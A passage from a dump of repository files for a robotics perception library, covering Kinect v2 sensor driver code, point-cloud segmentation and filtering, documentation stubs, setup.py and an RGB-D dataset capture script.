)\n point_cloud_masked, valid_indices = point_cloud_filtered.box_mask(box)\n invalid_indices = np.setdiff1d(\n np.arange(point_cloud_filtered.num_points), valid_indices\n )\n\n # apply PCL filters\n pcl_cloud = pcl.PointCloud(point_cloud_masked.data.T.astype(np.float32))\n tree = pcl_cloud.make_kdtree()\n ec = pcl_cloud.make_EuclideanClusterExtraction()\n ec.set_ClusterTolerance(0.005)\n # ec.set_MinClusterSize(1)\n # ec.set_MaxClusterSize(250)\n ec.set_MinClusterSize(250)\n ec.set_MaxClusterSize(1000000)\n ec.set_SearchMethod(tree)\n cluster_indices = ec.Extract()\n num_clusters = len(cluster_indices)\n\n segments = []\n filtered_points = np.zeros([3, point_cloud_masked.num_points])\n cur_i = 0\n for j, indices in enumerate(cluster_indices):\n num_points = len(indices)\n points = np.zeros([3, num_points])\n\n for i, index in enumerate(indices):\n points[0, i] = pcl_cloud[index][0]\n points[1, i] = pcl_cloud[index][1]\n points[2, i] = pcl_cloud[index][2]\n\n filtered_points[:, cur_i : cur_i + num_points] = points.copy()\n cur_i = cur_i + num_points\n\n seg_point_cloud = PointCloud(points, frame=\"world\")\n segments.append(seg_point_cloud)\n\n all_points = np.c_[\n filtered_points[:, :cur_i],\n point_cloud_filtered.data[:, invalid_indices],\n ]\n point_cloud_filtered = PointCloud(all_points, frame=\"world\")\n pcl_stop = time.time()\n logging.info(\"PCL Seg took %.3f sec\" % (pcl_stop - pcl_start))\n\n if vis_segments:\n vis3d.figure(\n camera_pose=T_camera_world.as_frames(\"camera\", \"world\"),\n focal_point=focal_point,\n )\n for i, segment in enumerate(segments):\n color = plt.get_cmap(\"hsv\")(float(i) / num_clusters)[:-1]\n vis3d.points(segment, scale=0.001, color=color, subsample=5)\n vis3d.show()\n\n if vis_final_clouds:\n vis3d.figure(\n camera_pose=T_camera_world.as_frames(\"camera\", \"world\"),\n focal_point=focal_point,\n )\n # vis3d.points(point_cloud_world,\n # scale=0.001,\n # color=(1,0,0),\n # subsample=10)\n vis3d.points(\n point_cloud_filtered, scale=0.001, color=(0, 0, 1), subsample=5\n )\n vis3d.show()\n\n # convert to depth image\n project_start = time.time()\n point_cloud_cam = T_camera_world.inverse() * point_cloud_filtered\n depth_im_filtered = small_camera_intr.project_to_image(point_cloud_cam)\n noise_mask = depth_im_filtered.to_binary()\n logging.info(\"Project took %.3f sec\" % (time.time() - project_start))\n depth_im_filtered = depth_im_filtered.inpaint(0.5)\n\n filter_stop = time.time()\n logging.info(\"Filtering took %.3f sec\" % (filter_stop - filter_start))\n\n if vis_final_images:\n vis2d.figure()\n vis2d.subplot(2, 2, 1)\n vis2d.imshow(depth_im)\n vis2d.title(\"Orig\")\n vis2d.subplot(2, 2, 2)\n vis2d.imshow(depth_im_orig)\n vis2d.title(\"Inpainted\")\n vis2d.subplot(2, 2, 3)\n vis2d.imshow(noise_mask)\n vis2d.title(\"Mask\")\n vis2d.subplot(2, 2, 4)\n vis2d.imshow(depth_im_filtered)\n vis2d.title(\"Filtered\")\n vis2d.show()\n"
},
{
"alpha_fraction": 0.5633578300476074,
"alphanum_fraction": 0.5711686015129089,
"avg_line_length": 30.852657318115234,
"blob_id": "8aa3d8b230dc86ae25ad1ddf21ce9eb6f82d957f",
"content_id": "ab2d2d8066b8bdf97225d2dc6d2586e75b1f69c7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13187,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 414,
"path": "/perception/kinect2_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClass for interfacing with the Primesense RGBD sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\n\nimport numpy as np\nimport pylibfreenect2 as lf2\nfrom autolab_core import (\n CameraIntrinsics,\n ColorImage,\n DepthImage,\n Image,\n IrImage,\n)\nfrom autolab_core.constants import MM_TO_METERS\n\nfrom .camera_sensor import CameraSensor\n\n\nclass Kinect2PacketPipelineMode:\n \"\"\"Type of pipeline for Kinect packet processing.\"\"\"\n\n OPENGL = 0\n CPU = 1\n OPENCL = 2\n AUTO = 3\n\n\nclass Kinect2FrameMode:\n \"\"\"Type of frames that Kinect processes.\"\"\"\n\n COLOR_DEPTH = 0\n COLOR_DEPTH_IR = 1\n\n\nclass Kinect2RegistrationMode:\n \"\"\"Kinect registration mode.\"\"\"\n\n NONE = 0\n COLOR_TO_DEPTH = 1\n\n\nclass Kinect2DepthMode:\n \"\"\"Kinect depth mode setting.\"\"\"\n\n METERS = 0\n MILLIMETERS = 1\n\n\nclass Kinect2Sensor(CameraSensor):\n # constants for image height and width (in case they're needed somewhere)\n \"\"\"Class for interacting with a Kinect v2 RGBD sensor directly through\n protonect driver. https://github.com/OpenKinect/libfreenect2\n \"\"\"\n\n # Constants for image height and width (in case they're needed somewhere)\n COLOR_IM_HEIGHT = 1080\n COLOR_IM_WIDTH = 1920\n DEPTH_IM_HEIGHT = 424\n DEPTH_IM_WIDTH = 512\n\n def __init__(\n self,\n packet_pipeline_mode=Kinect2PacketPipelineMode.AUTO,\n registration_mode=Kinect2RegistrationMode.COLOR_TO_DEPTH,\n depth_mode=Kinect2DepthMode.METERS,\n device_num=0,\n frame=None,\n ):\n \"\"\"Initialize a Kinect v2 sensor directly to the protonect driver with\n the given configuration. When kinect is connected to the protonect\n driver directly, the iai_kinect kinect_bridge cannot be run at the\n same time.\n\n Parameters\n ----------\n packet_pipeline_mode : int\n Either Kinect2PacketPipelineMode.OPENGL,\n Kinect2PacketPipelineMode.OPENCL or\n Kinect2PacketPipelineMode.CPU -- indicates packet processing type.\n If not specified the packet pipeline will be determined\n automatically.\n\n registration_mode : int\n Either Kinect2RegistrationMode.NONE or\n Kinect2RegistrationMode.COLOR_TO_DEPT -- The mode for registering\n a color image to the IR camera frame of reference.\n\n depth_mode : int\n Either Kinect2DepthMode.METERS or Kinect2DepthMode.MILLIMETERS --\n the units for depths returned from the Kinect frame arrays.\n\n device_num : int\n The sensor's device number on the USB bus.\n\n frame : :obj:`str`\n The name of the frame of reference in which the sensor resides.\n If None, this will be set to 'kinect2_num', where num is replaced\n with the device number.\n \"\"\"\n self._device = None\n self._running = False\n self._packet_pipeline_mode = packet_pipeline_mode\n self._registration_mode = registration_mode\n self._depth_mode = depth_mode\n self._device_num = device_num\n self._frame = frame\n\n if self._frame is None:\n self._frame = \"kinect2_%d\" % (self._device_num)\n self._color_frame = \"%s_color\" % (self._frame)\n self._ir_frame = (\n self._frame\n ) # same as color since we normally use this one\n\n def __del__(self):\n \"\"\"Automatically stop the sensor for safety.\"\"\"\n if self.is_running:\n self.stop()\n\n @property\n def color_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : Color camera intrinsics of Kinect.\"\"\"\n if self._device is None:\n raise RuntimeError(\n \"Kinect2 device not runnning. Cannot return color intrinsics\"\n )\n camera_params = self._device.getColorCameraParams()\n return CameraIntrinsics(\n self._color_frame,\n camera_params.fx,\n camera_params.fy,\n camera_params.cx,\n camera_params.cy,\n )\n\n @property\n def ir_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : IR camera intrinsics for the Kinect.\"\"\"\n if self._device is None:\n raise RuntimeError(\n \"Kinect2 device not runnning. Cannot return IR intrinsics\"\n )\n camera_params = self._device.getIrCameraParams()\n return CameraIntrinsics(\n self._ir_frame,\n camera_params.fx,\n camera_params.fy,\n camera_params.cx,\n camera_params.cy,\n height=Kinect2Sensor.DEPTH_IM_HEIGHT,\n width=Kinect2Sensor.DEPTH_IM_WIDTH,\n )\n\n @property\n def is_running(self):\n \"\"\"bool : True if the stream is running, or false otherwise.\"\"\"\n return self._running\n\n @property\n def frame(self):\n \"\"\":obj:`str` : The reference frame of the sensor.\"\"\"\n return self._frame\n\n @property\n def color_frame(self):\n \"\"\":obj:`str` : The reference frame of the color sensor.\"\"\"\n return self._color_frame\n\n @property\n def ir_frame(self):\n \"\"\":obj:`str` : The reference frame of the IR sensor.\"\"\"\n return self._ir_frame\n\n def start(self):\n \"\"\"Starts the Kinect v2 sensor stream.\n\n Raises\n ------\n IOError\n If the Kinect v2 is not detected.\n \"\"\"\n\n # setup logger\n self._logger = lf2.createConsoleLogger(lf2.LoggerLevel.Warning)\n lf2.setGlobalLogger(self._logger)\n\n # open packet pipeline\n self._pipeline = None\n if (\n self._packet_pipeline_mode == Kinect2PacketPipelineMode.OPENGL\n or self._packet_pipeline_mode == Kinect2PacketPipelineMode.AUTO\n ):\n # Try OpenGL packet pipeline first or if specified\n try:\n self._pipeline = lf2.OpenGLPacketPipeline()\n except BaseException:\n logging.warning(\n \"OpenGL not available. \"\n \"Defaulting to CPU-based packet pipeline.\"\n )\n\n if self._pipeline is None and (\n self._packet_pipeline_mode == Kinect2PacketPipelineMode.OPENCL\n or self._packet_pipeline_mode == Kinect2PacketPipelineMode.AUTO\n ):\n # Try OpenCL if available\n try:\n self._pipeline = lf2.OpenCLPacketPipeline()\n except BaseException:\n logging.warning(\n \"OpenCL not available. Defaulting to CPU packet pipeline.\"\n )\n\n if (\n self._pipeline is None\n or self._packet_pipeline_mode == Kinect2PacketPipelineMode.CPU\n ): # CPU packet pipeline\n self._pipeline = lf2.CpuPacketPipeline()\n\n # check devices\n self._fn_handle = lf2.Freenect2()\n self._num_devices = self._fn_handle.enumerateDevices()\n if self._num_devices == 0:\n raise IOError(\n \"Failed to start stream. No Kinect2 devices available!\"\n )\n if self._num_devices <= self._device_num:\n raise IOError(\n \"Failed to start stream. Device num %d unavailable!\"\n % (self._device_num)\n )\n\n # open device\n self._serial = self._fn_handle.getDeviceSerialNumber(self._device_num)\n self._device = self._fn_handle.openDevice(\n self._serial, pipeline=self._pipeline\n )\n\n # add device sync modes\n self._listener = lf2.SyncMultiFrameListener(\n lf2.FrameType.Color | lf2.FrameType.Ir | lf2.FrameType.Depth\n )\n self._device.setColorFrameListener(self._listener)\n self._device.setIrAndDepthFrameListener(self._listener)\n\n # start device\n self._device.start()\n\n # open registration\n self._registration = None\n if self._registration_mode == Kinect2RegistrationMode.COLOR_TO_DEPTH:\n logging.debug(\"Using color to depth registration\")\n self._registration = lf2.Registration(\n self._device.getIrCameraParams(),\n self._device.getColorCameraParams(),\n )\n self._running = True\n\n def stop(self):\n \"\"\"Stops the Kinect2 sensor stream.\n\n Returns\n -------\n bool\n True if the stream was stopped, False if the device was already\n stopped or was not otherwise available.\n \"\"\"\n # check that everything is running\n if not self._running or self._device is None:\n logging.warning(\n \"Kinect2 device %d not runnning. Aborting stop\"\n % (self._device_num)\n )\n return False\n\n # stop the device\n self._device.stop()\n self._device.close()\n self._device = None\n self._running = False\n return True\n\n def frames(self, skip_registration=False):\n \"\"\"Retrieve a new frame from the Kinect and convert it to a\n ColorImage and a DepthImage\n\n Parameters\n ----------\n skip_registration : bool\n If True, the registration step is skipped.\n\n Returns\n -------\n :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`\n The ColorImage and DepthImage of the current frame.\n\n Raises\n ------\n RuntimeError\n If the Kinect stream is not running.\n \"\"\"\n color_im, depth_im, _, _ = self._frames_and_index_map(\n skip_registration=skip_registration\n )\n return color_im, depth_im\n\n def median_depth_img(self, num_img=1):\n \"\"\"Collect a series of depth images and return the median of the set.\n\n Parameters\n ----------\n num_img : int\n The number of consecutive frames to process.\n\n Returns\n -------\n :obj:`DepthImage`\n The median DepthImage collected from the frames.\n \"\"\"\n depths = []\n\n for _ in range(num_img):\n _, depth, _ = self.frames()\n depths.append(depth)\n\n return Image.median_images(depths)\n\n def _frames_and_index_map(self, skip_registration=False):\n \"\"\"Retrieve a new frame from the Kinect and return a ColorImage,\n DepthImage, IrImage, and a map from depth pixels to color\n pixel indices.\n\n Parameters\n ----------\n skip_registration : bool\n If True, the registration step is skipped.\n\n Returns\n -------\n :obj:`tuple` of :obj:`ColorImage`, :obj:`DepthImage`,\n :obj:`IrImage`, :obj:`numpy.ndarray`\n The ColorImage, DepthImage, and IrImage of the\n current frame, and an ndarray that maps pixels\n of the depth image to the index of the\n corresponding pixel in the color image.\n\n Raises\n ------\n RuntimeError\n If the Kinect stream is not running.\n \"\"\"\n if not self._running:\n raise RuntimeError(\n \"Kinect2 device %s not runnning. Cannot read frames\"\n % (self._device_num)\n )\n\n # read frames\n frames = self._listener.waitForNewFrame()\n unregistered_color = frames[\"color\"]\n distorted_depth = frames[\"depth\"]\n ir = frames[\"ir\"]\n\n # apply color to depth registration\n color_frame = self._color_frame\n color = unregistered_color\n depth = distorted_depth\n color_depth_map = (\n np.zeros([depth.height, depth.width]).astype(np.int32).ravel()\n )\n if (\n not skip_registration\n and self._registration_mode\n == Kinect2RegistrationMode.COLOR_TO_DEPTH\n ):\n color_frame = self._ir_frame\n depth = lf2.Frame(\n depth.width, depth.height, 4, lf2.FrameType.Depth\n )\n color = lf2.Frame(\n depth.width, depth.height, 4, lf2.FrameType.Color\n )\n self._registration.apply(\n unregistered_color,\n distorted_depth,\n depth,\n color,\n color_depth_map=color_depth_map,\n )\n\n # convert to array (copy needed to prevent reference of deleted data\n color_arr = np.copy(color.asarray())\n color_arr[:, :, [0, 2]] = color_arr[:, :, [2, 0]] # convert BGR to RGB\n color_arr[:, :, 0] = np.fliplr(color_arr[:, :, 0])\n color_arr[:, :, 1] = np.fliplr(color_arr[:, :, 1])\n color_arr[:, :, 2] = np.fliplr(color_arr[:, :, 2])\n color_arr[:, :, 3] = np.fliplr(color_arr[:, :, 3])\n depth_arr = np.fliplr(np.copy(depth.asarray()))\n ir_arr = np.fliplr(np.copy(ir.asarray()))\n\n # convert from mm to meters\n if self._depth_mode == Kinect2DepthMode.METERS:\n depth_arr = depth_arr * MM_TO_METERS\n\n # Release and return\n self._listener.release(frames)\n return (\n ColorImage(color_arr[:, :, :3], color_frame),\n DepthImage(depth_arr, self._ir_frame),\n IrImage(ir_arr.astype(np.uint16), self._ir_frame),\n color_depth_map,\n )\n"
},
{
"alpha_fraction": 0.6083915829658508,
"alphanum_fraction": 0.6083915829658508,
"avg_line_length": 19.428571701049805,
"blob_id": "8727d3f992a10ed534cbfa1ffc03c6ad106b3f58",
"content_id": "d7fd09728d2744b74a0330110aaa61469a58abb6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 143,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 7,
"path": "/docs/source/api/cnn.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Convolutional Neural Networks\n=============================\nClasses for deploying ConvNets.\n\nAlexNet\n~~~~~~~\n.. autoclass:: perception.AlexNet\n"
},
{
"alpha_fraction": 0.6109589338302612,
"alphanum_fraction": 0.6273972392082214,
"avg_line_length": 20.47058868408203,
"blob_id": "bc100b1c17e1520c8b1ffc3565e99b1e03ce3820",
"content_id": "49f1fc228fe82ec2927bcf3724f066a87569a661",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 17,
"path": "/tools/test_weight_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTest the loadstar weight sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport time\n\nfrom perception import WeightSensor\n\nif __name__ == \"__main__\":\n # sensor\n weight_sensor = WeightSensor()\n weight_sensor.start()\n weight_sensor.tare()\n for i in range(100):\n print(\"Total weight:\", weight_sensor.read().sum())\n time.sleep(0.05)\n weight_sensor.stop()\n"
},
{
"alpha_fraction": 0.8066037893295288,
"alphanum_fraction": 0.8066037893295288,
"avg_line_length": 25.5,
"blob_id": "6cf1b2dfa2ac0c0162c32cf4fb2e5db761562ba6",
"content_id": "b7bc7d294303929843c63ebc4850a909116c35b3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 8,
"path": "/perception/__init__.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAutolab Drivers\nAuthors: Jeff, Jacky, Mike\n\"\"\"\nfrom .camera_sensor import CameraSensor\nfrom .rgbd_sensors import RgbdSensorFactory\nfrom .weight_sensor import WeightSensor\nfrom .video_recorder import VideoRecorder\n"
},
{
"alpha_fraction": 0.7024253606796265,
"alphanum_fraction": 0.7052238583564758,
"avg_line_length": 25.121952056884766,
"blob_id": "25874e5fbc1948cbd1c2f89d0974d38847b48f3c",
"content_id": "0aea4dc9e24a09c43923c05d778c6c792bd13a63",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1072,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 41,
"path": "/docs/source/install/install.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Installation Instructions\n=========================\n\nThis package is installable via `pip` ::\n\n $ pip install autolab_perception\n\nDocumentation\n~~~~~~~~~~~~~\n\nBuilding\n\"\"\"\"\"\"\"\"\nBuilding `autolab_perception`'s documentation requires a few extra dependencies --\nspecifically, `sphinx`_ and a few plugins.\n\n.. _sphinx: http://www.sphinx-doc.org/en/1.4.8/\n\nTo install the dependencies required, simply change directories into the `autolab_core` source and run ::\n\n $ pip install .[docs]\n\nThen, go to the `docs` directory and run ``make`` with the appropriate target.\nFor example, ::\n\n $ cd docs/\n $ make html\n\nwill generate a set of web pages. Any documentation files\ngenerated in this manner can be found in `docs/build`.\n\nDeploying\n\"\"\"\"\"\"\"\"\"\nTo deploy documentation to the Github Pages site for the repository,\nsimply push any changes to the documentation source to master\nand then run ::\n\n $ . gh_deploy.sh\n\nfrom the `docs` folder. This script will automatically checkout the\n``gh-pages`` branch, build the documentation from source, and push it\nto Github.\n\n"
},
{
"alpha_fraction": 0.6175548434257507,
"alphanum_fraction": 0.6250783801078796,
"avg_line_length": 29.673076629638672,
"blob_id": "310624e3c7399cb9d92ddccd679d051ab5346e2f",
"content_id": "b24807506bfeb761d22b792f481d5122247723fe",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1595,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 52,
"path": "/setup.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSetup of Berkeley AUTOLab Perception module Python codebase.\nAuthor: Jeff Mahler\n\"\"\"\nimport os\n\nfrom setuptools import setup\n\nrequirements = [\n \"numpy\",\n \"scipy\",\n \"autolab_core\",\n \"opencv-python\",\n \"pyserial>=3.4\",\n \"ffmpeg-python\",\n]\n\n# load __version__ without importing anything\nversion_file = os.path.join(os.path.dirname(__file__), \"perception/version.py\")\nwith open(version_file, \"r\") as f:\n # use eval to get a clean string of version from file\n __version__ = eval(f.read().strip().split(\"=\")[-1])\n\nsetup(\n name=\"autolab_perception\",\n version=__version__,\n description=\"Perception utilities for the Berkeley AutoLab\",\n author=\"Jeff Mahler\",\n author_email=\"[email protected]\",\n maintainer=\"Mike Danielczuk\",\n maintainer_email=\"[email protected]\",\n license=\"Apache Software License\",\n url=\"https://github.com/BerkeleyAutomation/perception\",\n keywords=\"robotics grasping vision perception\",\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Natural Language :: English\",\n \"Topic :: Scientific/Engineering\",\n ],\n packages=[\"perception\"],\n install_requires=requirements,\n extras_require={\n \"docs\": [\"sphinx\", \"sphinxcontrib-napoleon\", \"sphinx_rtd_theme\"],\n \"ros\": [\"primesense\", \"rospkg\", \"catkin_pkg\", \"empy\"],\n },\n)\n"
},
{
"alpha_fraction": 0.5834683179855347,
"alphanum_fraction": 0.588650643825531,
"avg_line_length": 33.68988800048828,
"blob_id": "1e248336a1003dc2f269dae6d04e08b772af5ed8",
"content_id": "670d0fcd06921e6af51e9e6cbac7dcc30c39e545",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15437,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 445,
"path": "/tools/capture_dataset.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to capture a set of test images.\nBe sure to register beforehand!!!\nAuthor: Jeff Mahler\n\"\"\"\nimport argparse\nimport logging\nimport os\n\nimport autolab_core.utils as utils\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pcl\nimport rosgraph.roslogging as rl\nimport rospy\nimport scipy.stats as ss\nimport trimesh\nfrom autolab_core import (\n Box,\n PointCloud,\n RigidTransform,\n TensorDataset,\n YamlConfig,\n)\nfrom autolab_core.constants import TEST_ID, TRAIN_ID\nfrom meshrender import MaterialProperties, Scene, SceneObject, VirtualCamera\nfrom visualization import Visualizer2D as vis2d\n\nfrom perception import RgbdSensorFactory\n\nGUI_PAUSE = 0.5\n\n\ndef preprocess_images(\n raw_color_im,\n raw_depth_im,\n camera_intr,\n T_camera_world,\n workspace_box,\n workspace_im,\n image_proc_config,\n):\n \"\"\"Preprocess a set of color and depth images.\"\"\"\n # read params\n inpaint_rescale_factor = image_proc_config[\"inpaint_rescale_factor\"]\n cluster = image_proc_config[\"cluster\"]\n cluster_tolerance = image_proc_config[\"cluster_tolerance\"]\n min_cluster_size = image_proc_config[\"min_cluster_size\"]\n max_cluster_size = image_proc_config[\"max_cluster_size\"]\n\n # deproject into 3D world coordinates\n point_cloud_cam = camera_intr.deproject(raw_depth_im)\n point_cloud_cam.remove_zero_points()\n point_cloud_world = T_camera_world * point_cloud_cam\n\n # compute the segmask for points above the box\n seg_point_cloud_world, _ = point_cloud_world.box_mask(workspace_box)\n seg_point_cloud_cam = T_camera_world.inverse() * seg_point_cloud_world\n depth_im_seg = camera_intr.project_to_image(seg_point_cloud_cam)\n\n # mask out objects in the known workspace\n env_pixels = depth_im_seg.pixels_farther_than(workspace_im)\n depth_im_seg._data[env_pixels[:, 0], env_pixels[:, 1]] = 0\n\n # REMOVE NOISE\n # clip low points\n low_indices = np.where(\n point_cloud_world.data[2, :] < workspace_box.min_pt[2]\n )[0]\n point_cloud_world.data[2, low_indices] = workspace_box.min_pt[2]\n\n # clip high points\n high_indices = np.where(\n point_cloud_world.data[2, :] > workspace_box.max_pt[2]\n )[0]\n point_cloud_world.data[2, high_indices] = workspace_box.max_pt[2]\n\n # segment out the region in the workspace (including the table)\n workspace_point_cloud_world, valid_indices = point_cloud_world.box_mask(\n workspace_box\n )\n invalid_indices = np.setdiff1d(\n np.arange(point_cloud_world.num_points), valid_indices\n )\n\n if cluster:\n # create new cloud\n pcl_cloud = pcl.PointCloud(\n workspace_point_cloud_world.data.T.astype(np.float32)\n )\n tree = pcl_cloud.make_kdtree()\n\n # find large clusters (likely to be real objects instead of noise)\n ec = pcl_cloud.make_EuclideanClusterExtraction()\n ec.set_ClusterTolerance(cluster_tolerance)\n ec.set_MinClusterSize(min_cluster_size)\n ec.set_MaxClusterSize(max_cluster_size)\n ec.set_SearchMethod(tree)\n cluster_indices = ec.Extract()\n\n # read out all points in large clusters\n filtered_points = np.zeros([3, workspace_point_cloud_world.num_points])\n cur_i = 0\n for j, indices in enumerate(cluster_indices):\n num_points = len(indices)\n points = np.zeros([3, num_points])\n\n for i, index in enumerate(indices):\n points[0, i] = pcl_cloud[index][0]\n points[1, i] = pcl_cloud[index][1]\n points[2, i] = pcl_cloud[index][2]\n\n filtered_points[:, cur_i : cur_i + num_points] = points.copy()\n cur_i = cur_i + num_points\n\n # reconstruct the point cloud\n all_points = np.c_[\n filtered_points[:, :cur_i],\n point_cloud_world.data[:, invalid_indices],\n ]\n else:\n all_points = point_cloud_world.data\n filtered_point_cloud_world = PointCloud(all_points, frame=\"world\")\n\n # compute the filtered depth image\n filtered_point_cloud_cam = (\n T_camera_world.inverse() * filtered_point_cloud_world\n )\n depth_im = camera_intr.project_to_image(filtered_point_cloud_cam)\n\n # form segmask\n segmask = depth_im_seg.to_binary()\n valid_px_segmask = depth_im.invalid_pixel_mask().inverse()\n segmask = segmask.mask_binary(valid_px_segmask)\n\n # inpaint\n color_im = raw_color_im.inpaint(rescale_factor=inpaint_rescale_factor)\n depth_im = depth_im.inpaint(rescale_factor=inpaint_rescale_factor)\n return color_im, depth_im, segmask\n\n\nif __name__ == \"__main__\":\n # set up logger\n logging.getLogger().setLevel(logging.INFO)\n rospy.init_node(\"capture_dataset\", anonymous=True)\n logging.getLogger().addHandler(rl.RosStreamHandler())\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Capture a dataset of RGB-D images from a set of sensors\"\n )\n parser.add_argument(\n \"output_dir\", type=str, help=\"directory to save output\"\n )\n parser.add_argument(\n \"num_images\", type=int, help=\"number of images to capture\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=None,\n help=\"path to configuration file to use\",\n )\n args = parser.parse_args()\n output_dir = args.output_dir\n num_images = args.num_images\n config_filename = args.config_filename\n\n # make output directory\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n # fix config\n if config_filename is None:\n config_filename = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n \"..\",\n \"cfg/tools/capture_dataset.yaml\",\n )\n\n # turn relative paths absolute\n if not os.path.isabs(config_filename):\n config_filename = os.path.join(os.getcwd(), config_filename)\n\n # read config\n config = YamlConfig(config_filename)\n dataset_config = config[\"dataset\"]\n sensor_configs = config[\"sensors\"]\n workspace_config = config[\"workspace\"]\n image_proc_config = config[\"image_proc\"]\n\n # read objects\n train_pct = config[\"train_pct\"]\n objects = config[\"objects\"]\n num_objects = len(objects)\n num_train = int(np.ceil(train_pct * num_objects))\n num_test = num_objects - num_train\n all_indices = np.arange(num_objects)\n np.random.shuffle(all_indices)\n train_indices = all_indices[:num_train]\n test_indices = all_indices[num_train:]\n\n num_train_images = int(np.ceil(train_pct * num_images))\n all_image_indices = np.arange(num_images)\n np.random.shuffle(all_image_indices)\n train_image_indices = all_image_indices[:num_train_images]\n\n # set random variable for the number of objects\n mean_num_objects = config[\"mean_num_objects\"]\n min_num_objects = config[\"min_num_objects\"]\n max_num_objects = config[\"max_num_objects\"]\n num_objs_rv = ss.poisson(mean_num_objects - 1)\n im_rescale_factor = image_proc_config[\"im_rescale_factor\"]\n\n save_raw = config[\"save_raw\"]\n vis = config[\"vis\"]\n\n # open gui\n gui = plt.figure(0, figsize=(8, 8))\n plt.ion()\n plt.title(\"INITIALIZING\")\n plt.imshow(np.zeros([100, 100]), cmap=plt.cm.gray_r)\n plt.axis(\"off\")\n plt.draw()\n plt.pause(GUI_PAUSE)\n\n # read workspace bounds\n workspace_box = Box(\n np.array(workspace_config[\"min_pt\"]),\n np.array(workspace_config[\"max_pt\"]),\n frame=\"world\",\n )\n\n # read workspace objects\n workspace_objects = {}\n for obj_key, obj_config in workspace_config[\"objects\"].iteritems():\n mesh_filename = obj_config[\"mesh_filename\"]\n pose_filename = obj_config[\"pose_filename\"]\n obj_mesh = trimesh.load_mesh(mesh_filename)\n obj_pose = RigidTransform.load(pose_filename)\n obj_mat_props = MaterialProperties(smooth=True, wireframe=False)\n scene_obj = SceneObject(obj_mesh, obj_pose, obj_mat_props)\n workspace_objects[obj_key] = scene_obj\n\n # setup each sensor\n datasets = {}\n sensors = {}\n sensor_poses = {}\n camera_intrs = {}\n workspace_ims = {}\n for sensor_name, sensor_config in sensor_configs.iteritems():\n # read params\n sensor_type = sensor_config[\"type\"]\n sensor_frame = sensor_config[\"frame\"]\n\n # read camera calib\n tf_filename = \"%s_to_world.tf\" % (sensor_frame)\n T_camera_world = RigidTransform.load(\n os.path.join(sensor_config[\"calib_dir\"], sensor_frame, tf_filename)\n )\n sensor_poses[sensor_name] = T_camera_world\n\n # setup sensor\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\n sensors[sensor_name] = sensor\n\n # start the sensor\n sensor.start()\n camera_intr = sensor.ir_intrinsics\n camera_intr = camera_intr.resize(im_rescale_factor)\n camera_intrs[sensor_name] = camera_intr\n\n # render image of static workspace\n scene = Scene()\n camera = VirtualCamera(camera_intr, T_camera_world)\n scene.camera = camera\n for obj_key, scene_obj in workspace_objects.iteritems():\n scene.add_object(obj_key, scene_obj)\n workspace_ims[sensor_name] = scene.wrapped_render([\"depth\"])[0]\n\n # fix dataset config\n dataset_config[\"fields\"][\"raw_color_ims\"][\n \"height\"\n ] = camera_intr.height\n dataset_config[\"fields\"][\"raw_color_ims\"][\"width\"] = camera_intr.width\n dataset_config[\"fields\"][\"raw_depth_ims\"][\n \"height\"\n ] = camera_intr.height\n dataset_config[\"fields\"][\"raw_depth_ims\"][\"width\"] = camera_intr.width\n dataset_config[\"fields\"][\"color_ims\"][\"height\"] = camera_intr.height\n dataset_config[\"fields\"][\"color_ims\"][\"width\"] = camera_intr.width\n dataset_config[\"fields\"][\"depth_ims\"][\"height\"] = camera_intr.height\n dataset_config[\"fields\"][\"depth_ims\"][\"width\"] = camera_intr.width\n dataset_config[\"fields\"][\"segmasks\"][\"height\"] = camera_intr.height\n dataset_config[\"fields\"][\"segmasks\"][\"width\"] = camera_intr.width\n\n # open dataset\n sensor_dataset_filename = os.path.join(output_dir, sensor_name)\n datasets[sensor_name] = TensorDataset(\n sensor_dataset_filename, dataset_config\n )\n\n # save raw\n if save_raw:\n 